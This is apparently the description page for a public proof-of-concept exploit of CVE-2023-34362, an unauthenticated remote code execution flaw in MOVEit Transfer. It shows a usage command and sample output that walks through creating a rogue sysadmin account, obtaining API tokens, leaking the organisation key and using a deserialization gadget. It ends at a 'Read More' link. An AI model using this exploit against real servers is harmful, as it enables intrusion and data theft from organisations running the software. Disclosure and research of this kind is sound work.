CVE-2023-34362: MOVEit Transfer Unauthenticated RCE For a full technical description of the vulnerability and exploitation, please read our AttackerKB Analysis. Usage ruby move.rb ruby move.rb 192.168.86.111 [+] Starting. target='https://192.168.86.111'. [+] Retrieved initial session token '3el524tvmjs4iceurhm1r2cq' and InstID '8937'. [+] Creating new sysadmin account: username='WZHTXMOU', userlogin='NMMLJIIP', password='LUOZFAIB'. [+] Got API access token='3k2Bs4DBE-5YhK4kBr9HoALoGm4UIsOEg-KYMC6kcB3hwtncbiW-FCrvyXu9JuLgaXBzBg9SeX-GaykQHXWE1R4FBK9G-koUKmGB4u34LNzio3mzMDPA3deCNjGVHOkeIPbHdkcH7BouMlUtFcI0PwRt2frY0z6jBxlpXwVr4GqprxTT8lBnqTRsTpq75Mw0g5WudKvqsIa7z7HH0kq7okp7OVH8M5ABWXiFQ0l2vS9ZlXMwuV9o-1LKt1_nFJjLMtUHGn6mNzMinge774X1gOXGws2Qpjl32PlmRShx2GX0yGb8NYsin_JpJeTI-6BFzS6tJbq_UFtKaoND9WH4oZS5sLW2SHlRPNsJIfBrsi6fYKRLewKThQ'. [+] Found folderId '963580724'. [+] Initiated resumable file upload for fileId '966492920'… [+] Leaked the Org Key: 0B 52 CA 0B FA 01 6F 19 5E D3 61 B1 B9 2A DA 75 [+] Using deserialization gadget:…Read More